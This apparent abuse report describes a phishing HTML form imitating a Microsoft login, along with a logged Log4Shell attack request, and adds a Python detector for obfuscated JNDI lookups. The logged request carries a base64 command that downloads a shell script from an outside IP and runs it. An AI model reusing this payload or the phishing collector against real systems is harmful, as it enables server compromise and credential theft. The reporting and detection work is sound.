I was sent an email with an "invoice" from a company I never heard of and a product I never bought. There was an HTML file attachment. Upon downloading and studying the code inside, I discovered that it was an HTML file made to imitate a Microsoft login form. This IP address was found base64 encoded in a hidden HTML input tag. The fully decoded text was "http://167.71.245.231/backUptester/1a6cih2w9s.php". This HTML input tag was next to a fake "Forgot my Password" link on the form. IP address seems to be owned by DigitalOcean.
This IP performed the following access request on my web server:
159.203.95.42 - - [17/Mar/2022:18:19:54 +0000] "GET /:80:undefined?id= HTTP/1.1" 404 1236 "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//159.203.109.65:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE2Ny4xNzIuMjI2LjIyMi84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNjcuMTcyLjIyNi4yMjIvOFVzQS5zaDsgY2htb2QgNzc3IDhVc0Euc2g7IHNoIDhVc0Euc2g=}')" "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//159.203.109.65:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE2Ny4xNzIuMjI2LjIyMi84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNjcuMTcyLjIyNi4yMjIvOFVzQS5zaDsgY2htb2QgNzc3IDhVc0Euc2g7IHNoIDhVc0Euc2g=}')"
Bad Web Bot, Web App Attack
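The request logged in the report above hides the word `jndi` behind `${env:BARFOO:-j}` default-value lookups, so a plain search for `${jndi:` in access logs misses it. The following is an added detection example, not part of the report or of AbuseIPDB; the function names are hypothetical, and the sample line is constructed with documentation IP addresses and a placeholder payload.

```python
import re

# Innermost ${anything:-default} lookup with no nested "${" inside it.
# When the key is unset the default is substituted, which is what the
# ${env:BARFOO:-j} fragments in the logged request rely on.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# Innermost ${lower:x} / ${upper:x}, another common keyword-splitting trick.
# The argument is kept as-is because the final match is case-insensitive.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
# A resolved JNDI lookup: capture the scheme and the host[:port] it points at.
JNDI = re.compile(r"\$\{jndi:(\w+)://([^/\s}]+)", re.I)


def normalize(text, max_rounds=10):
    """Resolve default-value and case lookups until the text stops changing."""
    for _ in range(max_rounds):  # bounded, so crafted nesting cannot loop forever
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        new = CASE_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(log_line):
    """Return (scheme, host:port) for each JNDI lookup found in a log line."""
    return [(m.group(1).lower(), m.group(2))
            for m in JNDI.finditer(normalize(log_line))]


# Constructed sample: same obfuscation style as the report, placeholder payload.
SAMPLE = (
    '198.51.100.7 - - [01/Jan/2022:00:00:00 +0000] "GET /?id= HTTP/1.1" 404 1236 "-" '
    '"t(\'${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}'
    '//203.0.113.5:1389/TomcatBypass/Command/Base64/Q09OU1RSVUNURUQ=}\')"'
)
BENIGN = '198.51.100.9 - - [01/Jan/2022:00:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/7.81.0"'

if __name__ == "__main__":
    for line in (SAMPLE, BENIGN):
        print(find_jndi(line))
```

The extracted callback host is the value to pivot on when checking egress firewall or DNS logs for outbound connections made by the web server.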